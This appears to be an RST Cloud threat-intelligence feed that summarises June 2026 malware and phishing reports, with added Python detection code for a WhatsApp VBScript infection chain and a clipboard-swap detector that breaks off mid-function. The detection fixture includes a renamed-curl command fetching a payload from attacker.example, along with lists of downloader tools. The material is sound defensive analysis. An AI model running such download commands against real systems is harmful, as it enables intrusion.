RST Cloud
@rst_cloud
Threat intelligence solutions for businesses of all sizes
Sydney, New South Wales. Joined January 2015
89 Following, 670 Followers. 12.6K posts

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, code: 6

#threatreport #HighCompleteness
An Income Tax Assessment Notice Phishing Campaign Delivering Malware | 23-06-2026
Source: cyfirma.com/research/an-in…
Key details below ↓
💀Threats:
Confuserex_tool, Dll_sideloading_technique, Xworm_rat, Spear-phishing_technique
🎯Victims: Users in india, Organizations in india
🏭Industry: Government
🌐Geo: Indian, Hong kong, China, India
📚TTPs:
⚔️Tactics: 8
🛠️Technics: 22
🧨IOCs:
- Domain: 1
- File: 2
- IP: 3
- Hash: 8
🔢Algorithms: zip, sha256, md5
🔠Functions: SetAutoRun, GetWindowsVersion, GetIdleTime
🗂️Win API: DllEntry, GetSecurityInfo
YARA: Found
#threatreport:
A recent malware campaign identified by CYFIRMA leverages a fraudulent Indian Income Tax Department-themed phishing lure to deliver a sophisticated Remote Access Trojan (RAT)-like payload. The attack primarily utilizes a phishing website hosted on the domain harivo.vip, designed to mimic authentic government communication, thus enticing victims to download malicious software masquerading as an official tax assessment notification. The lure incorporates legal language and compliance urgency to enhance its believability, prompting users to download a ZIP archive titled Tax_Assessment_0609.zip.
Upon extraction, this archive reveals a malicious disk image file named Tax_Assessment.img, which contains multiple malware components including a Portable Executable (PE) file (Tax_Assessment.exe) that acts as a loader and a DLL (libsvcs.dll). Technical analysis shows that Tax_Assessment.exe employs .NET reflection to dynamically load the DLL, thereby obscuring its malicious intent and complicating static analysis attempts. Both components were obfuscated using ConfuserEx, further complicating detection and making reverse engineering challenging.
The payload, libsvcs.dll, exhibits typical RAT functionalities, including methods for establishing persistent backdoor access, gathering system information, and enabling remote command execution via encrypted communications. The binary is configured to connect to a hardcoded Command-and-Control (C2) server located at 103.231.12.27:4444, utilizing an embedded 32-byte encryption key for secure communication.
The threat actors behind this campaign are assessed to be financially motivated, utilizing social engineering tactics to deceive targets. The operational design reflects a structured infection methodology with multiple stages of payload delivery, maximizing flexibility while minimizing detection risks. This includes the use of misleading documents as well as techniques that hide execution behaviors and modify system registries.
While the C2 infrastructure points to geolocation in Hong Kong, it is critical to note that such information does not definitively indicate the threat actors' origins, as adversaries often use compromised systems and third-party hosting to obscure their tracks. Despite the enticingly regional indicators, comprehensive attribution remains undetermined.
Organizations are urged to enhance monitoring capabilities against tax-themed phishing attempts, fortify security measures around executable files, and improve detection mechanisms for suspicious behaviors associated with loader and DLL operations, particularly in response to newly observed communications and potentially malicious infrastructure.

#threatreport #MediumCompleteness
From PostCSS Masquerading to Windows RAT | 23-06-2026
Source: research.jfrog.com/post/from-post…
Key details below ↓
🎯Victims: Javascript build ecosystem, Software development, Open source software ecosystem
📚TTPs:
⚔️Tactics: 3
🛠️Technics: 0
🤖LLM extracted TTPs:
T1005, T1047, T1057, T1059, T1059.001, T1059.005, T1059.007, T1071.001, T1082, T1105, ...
🧨IOCs:
- File: 18
- Command: 1
- Domain: 1
- Url: 2
- IP: 1
- Hash: 6
💽Software: Chrome, curl, Nuitka, virtualbox, qemu, hyper-v, vmwaretray
🔢Algorithms: md5, aes-256-gcm, rc4, aes, gzip, zip, chacha20-poly1305
🗂️Win API: COMMAND0825INFORMATION, COMMAND0825AUTO, MSG0825LOG, NCryptOpenStorageProvider, NCryptOpenKey, NCryptDecrypt, SeDebugPrivilege
📜Programming Languages: javascript, powershell, python
#threatreport:
The investigation into a malicious package masquerading as the legitimate postcss-selector-parser highlights a sophisticated attack leveraging the JavaScript package ecosystem. This attack facilitates the deployment of a Windows Remote Access Trojan (RAT) that is capable of various malicious activities, including remote shell capabilities, file transfers, persistence mechanisms, host profiling, and the theft of Chrome credentials. The masquerade relies on the popularity of the legitimate postcss-selector-parser package, which reports over 150 million weekly downloads, to social-engineer unsuspecting users.
The malware employs a layered architecture with dependencies on seemingly benign packages like aes-decode-runner-pro and postcss-minify-selector-parser. These packages, upon decoding, lead to a PowerShell downloader that initiates the payload chain. The end result is a downloader that fetches additional malicious components from a command-and-control (C2) infrastructure. The PowerShell script downloads a Windows payload from the domain nvidiadriver.net, extracts it to the %TEMP% directory, and executes a VBS bootstrapper, thereby further deploying the malware.
Analyzing the payload reveals it operates through HTTP C2 communications, employing encrypted POST packets. It uses RC4/ARC4 for packet transport, integrating MD5 checksums for integrity. Persistence is maintained through the Windows Registry, dynamically collecting victim UUIDs and monitoring host actions, including machine checks to discern whether the malware is running in a virtual machine or a physical environment.
The malware is partitioned into multiple modules, such as config.pyd, api.pyd, and audiodriver.pyd, each focusing on distinct functionalities. The command dispatcher is crucial for orchestrating operations, managing the encrypted messaging to the C2 server, and executing the requested commands. Notably, the auto.pyd module is particularly concerning as it is responsible for Chrome credential theft, referencing essential Chrome profile files and utilizing Windows decryption APIs to facilitate access to saved logins.
Furthermore, the command.pyd module not only executes commands but also conducts profiling of the host environment to evade detection. It implements checks through Windows Management Instrumentation (WMI), process listings, and other indicators to ascertain if it is sandboxed within a virtualized setup.
In summary, this incident illustrates a targeted package-impersonation attack that aims to exploit trust within the npm ecosystem. The real threat materializes after the initial payload is decoded, leading to robust malicious capabilities including extensive data theft and system compromise.

#threatreport #LowCompleteness
Extended Rapid Response: Zimperium's On-Device Coverage of the EvilTokens Multi-Brand Phishing Campaign | 23-06-2026
Source: zimperium.com/blog/extended-…
Key details below ↓
💀Threats:
Eviltokens_tool, Device_code_phishing_technique
🎯Victims: Microsoft 365 users, Mobile users
🤖LLM extracted TTPs:
T1528, T1550.001, T1566.002, T1583.006
🔢Algorithms: aes-gcm
#threatreport:
The EvilTokens campaign represents a notable evolution in phishing tactics, utilizing a Phishing-as-a-Service (PhaaS) model that specifically targets users of Microsoft 365. This attack vector is marked by its sophisticated integration of device-code phishing, which allows it to operate under the guise of trusted brands like DocuSign and Adobe. Through the use of disposable Cloudflare Workers infrastructure, the campaign effectively circumvents standard security measures, making traditional static blocklisting approaches less effective against it.
A critical characteristic of the EvilTokens campaign is its ability to bypass both password and multi-factor authentication (MFA). Attackers exploit the legitimate Microsoft page for device approval, enabling victims to unknowingly approve the malicious device. This approach is particularly concerning as it leverages stolen refresh tokens, granting persistent access to attackers that remains viable even after victims reset their passwords. The campaign's impact is magnified by its focus on mobile devices, which are increasingly used to open phishing links. Mobile devices typically have weaker endpoint security controls, making them more susceptible to these types of attacks.
In response to these threats, Zimperium’s Mobile Threat Defense (MTD) solution has been effective in detecting and blocking the malicious URLs associated with EvilTokens at the mobile device level. This preemptive measure stops users from reaching the critical phishing step where device codes are entered. Moreover, ongoing research has led to the identification of numerous new domains associated with the EvilTokens phishing kit, indicating a broader compromise landscape. Indicators of compromise (IOCs) related to these domains are publicly accessible for further investigation, enabling organizations to strengthen their defenses against such sophisticated phishing threats.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
windows: 1, schema: 1

#threatreport #MediumCompleteness
WhatsApp VBScript Campaign Installs ManageEngine Endpoint Central for Persistent Remote Access | 23-06-2026
Source: socradar.io/blog/whatsapp-…
Key details below ↓
💀Threats:
Bitsadmin_tool, Motw_bypass_technique, Gh0st_rat, Valleyrat
🎯Victims: Consumers, Organizations
🌐Geo: Malaysia, Spain, French, Mexico, Australia, Vietnam, Brazil, India, Taiwan, Russia, Chinese, German, Singapore, Portuguese
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1027, T1036, T1036.008, T1059.005, T1105, T1112, T1218.007, T1219, T1548.002, T1553.005, ...
🧨IOCs:
- File: 12
- IP: 6
💽Software: WhatsApp, curl
🔢Algorithms: zip
📜Programming Languages: powershell, vbscript
#threatreport:
The WhatsApp VBScript campaign represents a socially engineered cyber attack wherein attackers distribute a malicious VBScript payload through hijacked WhatsApp accounts. This campaign targets a broad range of victims across multiple countries, with a notable concentration in Malaysia, which accounts for around 80% of reported incidents. The attackers seek to install ManageEngine Endpoint Central, a legitimate enterprise remote management tool, to maintain persistent control over compromised systems by exploiting the common use of WhatsApp for communication in corporate environments.
The initial stage of the attack involves using obfuscation techniques to make the VBScript payload appear benign. Attackers employ localized filenames and Windows Update-themed comments to trick users into executing the scripts. The VBScript can obfuscate its operations through methods like string concatenation, encoded content, and mimicking legitimate Windows utilities such as curl or bitsadmin, which are renamed and used to fetch additional malicious payloads.
In the second stage, the attack escalates as the script creates a randomized hidden directory within the system, facilitating the download of a ZIP file containing further scripts. By leveraging various methods including PowerShell and curl, the attacker extracts and executes these scripts while attempting to remove metadata that may trigger security warnings.
The final stage involves the silent installation of the ManageEngine Endpoint Central agent, allowing adversaries to perform remote administration without triggering typical red flags associated with malicious binaries. Although the campaign exhibits certain characteristics that may suggest the involvement of a Chinese-speaking threat actor, no definitive attribution has been established. The presence of certain IP addresses previously linked to other malware families does not conclusively identify a single operator.
This campaign raises new challenges for cybersecurity teams, as it blurs the lines between legitimate software and malicious activity, complicating detection and response efforts. Detection strategies should focus on unusual executions of wscript.exe, suspicious directory creations, and the monitoring of registry writes associated with privilege escalation. It is vital to impose network controls to block known malicious domains and scrutinize unexpected outbound connections to storage services frequently used for hosting payloads.

#threatreport #MediumCompleteness
Operation FlutterBridge: The FlutterShell macOS Backdoor | 23-06-2026
Source: levelblue.com/blogs/spiderla…
Key details below ↓
🧑💻Actors/Campaigns:
Cl-cri-1089
💀Threats:
Flutterbridge, Fluttershell, Sparkle_tool, Typosquatting_technique
🎯Victims: Macos users, Google chrome users
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 12
🧨IOCs:
- File: 6
- Domain: 1
- Hash: 9
💽Software: macOS, Flutter, Chrome, Google Chrome, flutter.flutter, Gatekeeper, Unix
🔢Algorithms: sha256
🔠Functions: setSparkleDelay
📜Programming Languages: javascript, objective_c
💻Platforms: apple, x86, arm
#threatreport:
Operation FlutterBridge has been identified as a sophisticated cyber campaign leveraging the Flutter framework to deploy macOS malware, specifically the FlutterShell backdoor. The malware operates by utilizing several Mach-O samples, demonstrating an evolution across three distinct generations. A key technical insight is that detection of the malware survives changes in command names and other identifiers, because the static binary is separated from the command payload. At runtime, a WebView loads attacker-controlled content, allowing commands to be issued through a JavaScript message channel known as FlutterInvoke.
Remarkably, the malware exhibits a conditional execution model reliant on a Command and Control (C2) server. The absence of any visible malicious behavior in the sandbox indicates that the malware remains inactive without a live C2 response. This behavior underscores the necessity for endpoint-level telemetry as the primary detection method, given that conventional behavioral sandboxes cannot simulate live C2 interactions.
Further analysis reveals shared structural properties across multiple payloads, such as identical exported-symbol fingerprints and consistent architecture. The deployments utilize a two-component architecture, with a stub launcher initiating a larger dynamically linked payload library housing the Dart runtime and the malicious logic. Each payload links exclusively to system libraries like libSystem.B.dylib, bypassing standard Apple frameworks, which helps differentiate it from legitimate macOS applications.
The operational strategy of the threat actor includes techniques like certificate rotation to circumvent Apple's Gatekeeper protections. Earlier generations leveraged valid Apple certificates to pass initial scrutiny, but subsequent variants have switched to self-signed artifacts for greater evasion capabilities. This approach allows the attacker to bypass revocation mechanisms effectively.
The attack vector typically involves targeting users through Google/YouTube ads with keywords related to common applications, such as podcast apps or PDF converters. Victims are redirected to typosquatted domains, where they download signed app bundles that appear legitimate. Once installed, the app deceptively presents a functional interface while establishing a connection to the attacker’s domain for command execution.
Specific insights also highlight payload behaviors such as attempts to modify Chrome's default search provider and suppress browser warning messages, as well as silent replacement of application bundles during update cycles. The unique attributes and operational behaviors observed in the FlutterShell malware create distinct defensive markers that can be monitored to detect anomalous activities tied to this malicious campaign.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
schema: 1, windows: 1, code: 10

#threatreport #MediumCompleteness
A VBScript campaign distributed through WhatsApp deploying RMM software | 22-06-2026
Source: securelist.com/whatsapp-vbs-r…
Key details below ↓
💀Threats:
Bitsadmin_tool, Gh0st_rat, Valleyrat
🎯Victims: Individual users, Whatsapp users, Consumers
🏭Industry: Financial
🌐Geo: Russia, German, Taiwan, Singapore, French, Chinese, Mexico, Brazil, Vietnam, Australia, Portuguese, Malaysia, Spain, India
📚TTPs:
⚔️Tactics: 1
🛠️Technics: 0
🤖LLM extracted TTPs:
T1036, T1036.003, T1059.001, T1059.005, T1105, T1204.002, T1219, T1553.005, T1564.001, T1566.003, ...
🧨IOCs:
- File: 41
- Path: 1
- IP: 6
- Hash: 41
- Domain: 8
💽Software: WhatsApp, curl
🔢Algorithms: zip
📜Programming Languages: powershell
#threatreport:
In June 2026, a malware campaign emerged, utilizing malicious VBScript files disseminated via WhatsApp direct messages. The campaign predominantly impacted users in Malaysia, with other affected regions including Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, and Vietnam. The primary vector for infection was WhatsApp Desktop and WhatsApp Web, where deceptive file names mimicking legitimate business documents coaxed users into executing the attachments. The VBScript triggers a multi-stage infection process culminating in the installation of Remote Monitoring and Management (RMM) software, allowing attackers remote access to the victim's system.
Analysis revealed that the threat actors compromised several WhatsApp accounts, employing these stolen credentials to spread the malware through contacts. Malicious attachments were sent without additional context, increasing the likelihood of user engagement. The file names used were often financial in nature, designed to exploit social engineering vulnerabilities—examples included terms like invoices, account statements, and debt notices, localized into various languages.
The initial attack stage features a VBScript that, when launched via Windows Script Host (WScript.exe), creates a working directory under C:\Users\Public\Documents. It downloads further payloads from attacker-controlled sources. Early variants of the malware employed Windows utilities such as curl.exe and bitsadmin.exe, with the files renamed to resemble DLLs to avoid arousing the user's suspicion. In the following stages the initial script downloads two more VBScript files: one seeks to modify User Account Control (UAC) settings, while the other downloads a ZIP file containing the RMM software installation package. Each downloader creates its own directory with a randomized name and often sets the hidden attribute to keep the content out of the user's view.
The installation process utilizes administrative privileges to ensure successful deployment of the RMM agent, indicating a sophisticated level of planning from the threat actors. Notably, the campaign’s infrastructure has shown potential links to previously identified malware such as ValleyRAT and Gh0st RAT, though definitive attribution remains uncertain. Analysis noted consistent Chinese-language comments across scripts, suggesting the involvement of a possible Chinese-speaking threat actor; however, the evidence is not robust enough for conclusive attribution.
Victimology data indicates that the campaign predominantly targets individual users rather than organizations, in a broad and opportunistic manner. Users are advised to exercise caution with unexpected attachments, even from recognized contacts, particularly with script or executable file types, which should only be opened after verifying their legitimacy.
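Detection logic for the behaviours both WhatsApp VBScript write-ups describe (a script host spawning a renamed curl or bitsadmin, a working directory under C:\Users\Public\Documents, UAC registry changes, a silent agent install), as an added example that is not code from the SOCRadar or Securelist posts. The event records are constructed, Sysmon-style telemetry with assumed field names; `original_file_name` stands in for Sysmon's OriginalFileName, which is what exposes a download utility after it has been renamed to look like a DLL.

```python
"""Detection logic for the WhatsApp VBScript -> RMM infection chain.

Constructed, Sysmon-style telemetry: one benign session plus the chain the
reports describe (wscript.exe, renamed download utility, working directory
under C:\\Users\\Public\\Documents, UAC registry change, silent MSI install).
Field names are an assumption of this example; "original_file_name" plays the
role of Sysmon's OriginalFileName (from the PE version resource), which is
what exposes curl.exe or bitsadmin.exe once it has been renamed to *.dll.
"""
import re

# Constructed sample events (ids are arbitrary; the URL and paths are made up).
EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "original_file_name": "EXPLORER.EXE", "cmdline": "explorer.exe"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Windows\explorer.exe", "original_file_name": "wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Invoice_2026-06.vbs"'},
    # curl.exe dropped as "msvcrt.dll": the image name lies, OriginalFileName does not.
    {"id": 3, "type": "process",
     "image": r"C:\Users\Public\Documents\x8f2kq\msvcrt.dll",
     "parent": r"C:\Windows\System32\wscript.exe", "original_file_name": "curl.exe",
     "cmdline": r"msvcrt.dll -s -o C:\Users\Public\Documents\x8f2kq\pkg.zip "
                r"http://attacker.example/pkg.zip"},
    # Randomized working directory created by the script host.
    {"id": 4, "type": "file", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\Public\Documents\x8f2kq"},
    # UAC policy value written by the second-stage script (T1548.002 / T1112).
    {"id": 5, "type": "registry", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
               r"\ConsentPromptBehaviorAdmin", "details": "DWORD (0x00000000)"},
    # Quiet MSI install of the RMM agent, parented by the script host (T1218.007).
    {"id": 6, "type": "process", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\wscript.exe", "original_file_name": "msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\Public\Documents\x8f2kq\agent.msi /qn"},
    # Benign: an administrator running curl from cmd.exe must not fire.
    {"id": 7, "type": "process", "image": r"C:\Windows\System32\curl.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "original_file_name": "curl.exe",
     "cmdline": "curl.exe -I https://example.org"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "powershell.exe"}
PUBLIC_DOCS = "c:\\users\\public\\documents\\"
# UAC-related values under HKLM\...\Policies\System.
UAC_VALUES = ("policies\\system\\enablelua",
              "policies\\system\\consentpromptbehavioradmin",
              "policies\\system\\promptonsecuredesktop")


def basename(path):
    """Lower-cased final path component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_script_host_downloader(ev):
    """wscript/cscript spawning a download utility, matched on OriginalFileName."""
    return (ev["type"] == "process" and basename(ev["parent"]) in SCRIPT_HOSTS
            and ev["original_file_name"].lower() in DOWNLOADERS)


def rule_masqueraded_binary(ev):
    """On-disk name differs from the PE's original name (curl.exe posing as a DLL)."""
    return (ev["type"] == "process"
            and ev["original_file_name"].lower() != basename(ev["image"]))


def rule_public_docs_dir(ev):
    """Script host creating a directory under the Public Documents folder."""
    return (ev["type"] == "file" and ev["target"].lower().startswith(PUBLIC_DOCS)
            and basename(ev["image"]) in SCRIPT_HOSTS)


def rule_uac_tamper(ev):
    """Registry write to a UAC policy value."""
    return ev["type"] == "registry" and ev["target"].lower().endswith(UAC_VALUES)


def rule_silent_msi_from_script(ev):
    """msiexec quiet install (/q, /qn, /qb, /quiet) whose parent is a script host."""
    return (ev["type"] == "process" and basename(ev["image"]) == "msiexec.exe"
            and basename(ev["parent"]) in SCRIPT_HOSTS
            and re.search(r"\s/q[nb]?\b|\s/quiet\b", ev["cmdline"], re.I) is not None)


RULES = [
    ("script_host_downloader", rule_script_host_downloader),
    ("masqueraded_binary", rule_masqueraded_binary),
    ("public_docs_dir", rule_public_docs_dir),
    ("uac_tamper", rule_uac_tamper),
    ("silent_msi_from_script", rule_silent_msi_from_script),
]


def detect(events):
    """Return, per rule name, the ids of the events that matched it."""
    return {name: [ev["id"] for ev in events if fn(ev)] for name, fn in RULES}


def triage(events):
    """Several distinct chain behaviours seen together raise confidence:
    a renamed downloader alone is suspicious; the whole sequence is the campaign."""
    fired = sum(1 for hits in detect(events).values() if hits)
    return "high" if fired >= 3 else "medium" if fired else "none"


if __name__ == "__main__":
    for name, hits in detect(EVENTS).items():
        print(f"{name:24s} events {hits}")
    print("triage:", triage(EVENTS))
```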

#threatreport #HighCompleteness
GhostShell (MB-0009): Targeting Ukraine’s UAV Operations and Defense Supply Chain | 22-06-2026
Source: blog.synapticsystems.de/ghostshell-mb-…
Key details below ↓
🧑💻Actors/Campaigns:
Uac-0244
Gamaredon
💀Threats:
Supply_chain_technique, Ghostshell, Kraken_cryptor, Mantis_botnet, Metasploit_tool, Process_injection_technique, Xray_tool, Native_loader, Vidar_stealer, Dead_drop_technique, Antidebugging_technique, Spear-phishing_technique
🎯Victims: Ukraine, Uav operations, Drone supply chain, Military units, Technical personnel, Procurement staff, Volunteer organizations, Defense sector partners
🏭Industry: Healthcare, Military
🌐Geo: Ukraine, Kazakhstan, Ukraines, Moldova, Russia, German, Germany, Spain, Ukrainian
🔓CVEs: CVE-2025-8088 [Vulners: vulners.com/cve/CVE-2025-8…]
- CVSS v3.1: 8.8
- Vulners: Exploitation: True
- Software: rarlab winrar (<7.13)
CVE-2025-6218 [Vulners: vulners.com/cve/CVE-2025-6…]
- CVSS v3.1: 7.8
- Vulners: Exploitation: True
- Software: rarlab winrar (<7.12)
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 14
🧨IOCs:
- File: 15
- Domain: 2
- Url: 7
- Hash: 17
- IP: 6
- Path: 1
💽Software: WinHTTP, Windows Security, Telegram, Discord, Steam, Outlook, curl, nginx
🔢Algorithms: ecdh, sha256, ecdsa, base64, xor, aes-256-gcm, aes-256-cbc, md5, gzip
🔠Functions: GetComputerName, GetUserName, CreateFile, GetTempPath
🗂️Win API: VirtualAlloc, VirtualProtect, LoadLibrary, GetProcAddress, WinHttpSetOption, GdiplusStartup, GetDC, CreateCompatibleBitmap, BitBlt, CreateProcess, ...
⚙️Win Services: bits
📜Programming Languages: visual_basic, python, golang
💻Platforms: x64
#threatreport:
The GhostShell malware campaign, labeled as MB-0009, has been observed targeting Ukraine's UAV operations and defense supply chain since February 2026. This new threat actor has not been correlated with previously known groups, differentiating its activities through a specific attack infrastructure and methodology. The malware exploits vulnerabilities CVE-2025-8088 and CVE-2025-6218 to deliver malicious payloads disguised in a RAR archive named “Besomar_documentation.rar,” which mimics legitimate documentation associated with the Ukrainian drone manufacturer Besomar. The targeted entities include military units and various defense-sector personnel, indicating a focus on operational access and supply chain intelligence.
The primary components of the malware's architecture involve a multi-stage infection process. The RAR archive drops a Visual Basic Script (VBS) file into the Windows Startup folder, ensuring persistence through the use of relative path traversal. This VBS file subsequently downloads additional executables—122.exe and update.exe—from a command and control (C2) domain, cloudaxis.cc. The behavior of these payloads points to sophisticated evasion techniques, including checks for sandboxes and the use of mutual TLS (mTLS) for secure communication with the C2 server, which only responds to clients that present a valid client certificate.
The executable 122.exe functions as a loader utilizing a CRPT XOR overlay mechanism, capable of executing a second-stage implant directly in memory. The second-stage implant authenticates via an embedded elliptic-curve mTLS client certificate, highlighting the sophisticated use of cryptography within the attack. Conversely, update.exe acts as an in-memory loader that masquerades as a Windows service while performing anti-analysis checks and fetching payloads from the C2 infrastructure. This loader retrieves subsequent shellcode and executes it in memory, effectively evading traditional detection mechanisms.
Additionally, another component, 22.exe, has been identified within this operation. It is characterized as a multi-stage launcher that utilizes AES-256-GCM encryption for configuration parameters and operates as a covert transport and proxy layer using an embedded Xray Core client. More significantly, it delivers Vidar v2, a well-known information stealer, which targets a range of sensitive user information—browser passwords, cookies, and cryptocurrency-related data—via the established proxy tunnel.
The overall structure of this malware campaign demonstrates a strategic approach to targeting high-value supply chain vulnerabilities critical to Ukraine's defense capabilities. With its emphasis on covert operation and data exfiltration, GhostShell poses a significant threat, especially given its potential connections to the geopolitical landscape surrounding the Ukraine conflict. The reported use of Telegram for C2 host resolution further illustrates the flexibility and adaptability of modern cyber threat actor methodologies, complicating traditional attribution efforts, though the presence of specific identifiers, such as the self-named "GhostShell Implant CA," could provide future avenues for analysis and detection.

#tireport #ExtractedDiagrams
The key diagram for the report (ML Classifier):
windows: 1, schema: 1, chats: 2

#threatreport #LowCompleteness
PixelSmash – Critical FFmpeg Vulnerability Turns Media Files into Weapons | 23-06-2026
Source: jfrog.com/blog/pixelsmas…
Key details below ↓
💀Threats:
Pixelsmash_vuln, Supply_chain_technique, Lumma_stealer
🎯Victims: Media processing applications, Media servers, Cloud storage platforms, Cloud transcoding services, Chat platforms, Network attached storage appliances, Smart televisions, Photo management platforms, Artificial intelligence and machine learning infrastructure, Linux desktop environments, ...
🏭Industry: Iot, Media
🔓CVEs: CVE-2026-8461 [Vulners: vulners.com/cve/CVE-2026-8…]
- CVSS v3.1: 8.8
- Vulners: Exploitation: Unknown
📚TTPs:
⚔️Tactics: 2
🛠️Technics: 0
🤖LLM extracted TTPs:
T1036, T1059.004, T1190, T1203, T1204.002, T1499.004
🧨IOCs:
- File: 5
💽Software: MagicYUV, Linux, Jellyfin, Slack, Discord, Telegram, Ubuntu, Debian, Fedora, Alpine, ...
🔠Functions: system, free
#threatreport:
A critical vulnerability has been identified in FFmpeg's MagicYUV decoder, designated CVE-2026-8461, which allows for remote code execution through specially crafted media files. This vulnerability results from a heap out-of-bounds write, with a CVSS score of 8.8, and affects numerous applications utilizing FFmpeg, including media processors like Kodi, Jellyfin, and Nextcloud. The issue can be triggered by merely processing a maliciously designed AVI, MKV, or MOV file, leading to crashes of affected applications and, in some cases, to full remote code execution.
To exploit the vulnerability, an attacker must deliver a carefully crafted media file to any software that decodes video using FFmpeg’s libavcodec. This can occur through desktop applications when a user opens a malicious file or when a file is uploaded to a media server, where automatic processing would trigger the vulnerability. Notably, the attack does not require any advanced permissions or user interactions beyond the initial file delivery, making it highly dangerous and exploitable through various means, including torrent downloads that automatically place files in watched directories.
The underlying cause of the vulnerability can be traced back to a rounding mismatch within the MagicYUV decoder's slice handling code. The error lies in improper validation of slice height, allowing attackers to manipulate buffer memory. The implications are serious, resulting not only in application crashes but potentially in arbitrary command execution, demonstrated through successful exploits on Jellyfin, where an attacker gained execution rights through normal media library scanning routines.
The impact of PixelSmash extends widely due to FFmpeg's pervasive integration into applications across the software ecosystem, making it a supply chain vulnerability. Since FFmpeg's libavcodec is a core dependency for numerous projects, many developers do not conduct thorough audits of its codec implementations, leading to silent propagation of this critical flaw into various downstream applications.
Real-world exploitation scenarios also illustrate the ease with which attackers can leverage the vulnerability. Automatic metadata extraction during media uploads to services like Nextcloud and Jellyfin, combined with the fact that the payload runs without alerting administrators, poses significant operational risks. Systems running long-lived FFmpeg services could remain compromised without any indication, and the nature of the attack means exploitation in cloud environments could continue unnoticed.
Additionally, new attack surfaces emerge in AI/ML infrastructures that process video inputs, suggesting further research into similar vulnerabilities in systems employing libavcodec for untrusted video data. It is imperative for systems that rely on FFmpeg to promptly update to patched versions or disable the vulnerable MagicYUV decoder to mitigate associated risks. This incident highlights the necessity for organizations to scrutinize their software supply chains for vulnerabilities lurking within dependencies, which can manifest severe security ramifications without direct developer involvement.

#threatreport #MediumCompleteness
Crypto Clipper uses Tor and worm-like propagation for persistence and control | 18-06-2026
Source: microsoft.com/en-us/security…
Key details below ↓
💀Threats:
Cryptobandits, Pyarmor_tool, Contebrew
🎯Victims: Cryptocurrency users, Organizations, End users
📚TTPs:
⚔️Tactics: 7
🛠️Technics: 8
🧨IOCs:
- File: 3
- Hash: 16
💽Software: Microsoft Defender, Microsoft Defender for Endpoint, Curl, PyInstaller, Task Scheduler
📲Wallets: tron
🪙Crypto: ethereum, bitcoin, monero
🔢Algorithms: sha256
📜Programming Languages: powershell, jscript, php, python, javascript
#threatreport:
A newly identified cryptocurrency clipper malware has been active since February 2026, exploiting Windows environments to conduct clipboard theft, screen capture, and cryptocurrency address substitution. This malware, referred to as a crypto clipper, operates without traditional installation methods and utilizes a Windows Script Host along with ActiveX to activate a bundled Tor client for command and control (C2) communications. Notably, it avoids using static IP infrastructure, opting instead for a more discreet Tor-based method.
The malware employs a two-component architecture: a worm that ensures its propagation by creating malicious shortcuts of legitimate files on compromised devices and a clipper component that targets cryptocurrency-related data. The worm's ability to generate malicious shortcuts linked to executable payloads facilitates stealthy infection processes while maintaining resilience against detection, especially through Microsoft Defender.
Upon execution, the first stage of the clipper inspects the running processes and declines to run in an environment where analysis tools such as Task Manager are present. Once these checks pass, it establishes communication with a hidden C2 server via a local Tor proxy, polling for instructions and continuously monitoring the clipboard for cryptocurrency wallet addresses and sensitive information, including seed phrases and private keys.
Defensively, the malware employs a multi-layered obfuscation strategy that complicates static analysis, using techniques such as Python-based obfuscation and encrypted components decrypted only at runtime. The operation minimizes visibility into its actions by routing traffic through localhost, obscuring the final destination, and enhancing anonymity for the attackers.
Command and control is facilitated through a local interface that allows the malware to receive and execute commands. Among its notable actions, it specifically captures clipboard data related to cryptocurrencies, applying custom rules to replace legitimate addresses copied by users with those under the control of the attackers. The malware also captures screenshots at regular intervals, providing further context for the threat actor concerning the user's activities.
The clipper's inherent persistence mechanisms involve creating scheduled tasks to ensure both the worm and stealer components remain operational even after system reboots. Key behaviors of this malware include clipboard monitoring and exploitation of symbolic links, further complicating detection efforts.
Organizations aiming to mitigate threats of this nature should focus on tightening script execution policies, monitoring traffic for misuse of local SOCKS proxies, and employing behavioral analysis to link suspicious script activity to signs of exfiltration or infiltration. The combination of these approaches offers a proactive path to identifying and thwarting similar lightweight, yet impactful threats in real time.
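As an added illustration (example code written for this page, not from the report or RST Cloud) of how a defender can surface the clipboard-swapping behaviour described above: a detector that treats a wallet address being replaced by a different address of the same type within one second as a clipper rewrite. The address patterns, the one-second window and the clipboard timeline are constructed assumptions; a real monitor would poll the OS clipboard instead of reading a prepared list.

```python
import re
from dataclasses import dataclass

# Address shapes a clipper typically rewrites. Patterns are this example's
# own (not from the report): Bitcoin legacy/P2SH and bech32, and Ethereum.
WALLET_PATTERNS = {
    "btc": re.compile(r"^(bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}
# A person re-copying a different address takes longer than this; a clipper
# rewriting the clipboard it just saw does not (heuristic chosen here).
SWAP_WINDOW_S = 1.0

@dataclass(frozen=True)
class ClipEvent:
    t: float      # seconds since the monitor started
    text: str     # clipboard contents observed at time t

def wallet_type(text):
    """Return 'btc', 'eth', or None for a clipboard string."""
    for name, pattern in WALLET_PATTERNS.items():
        if pattern.match(text.strip()):
            return name
    return None

def find_swaps(events, window=SWAP_WINDOW_S):
    """Return (t, original, replacement) for every suspicious rewrite: a wallet
    address replaced by a *different* address of the same type within `window`."""
    swaps = []
    prev = None
    for ev in sorted(events, key=lambda e: e.t):
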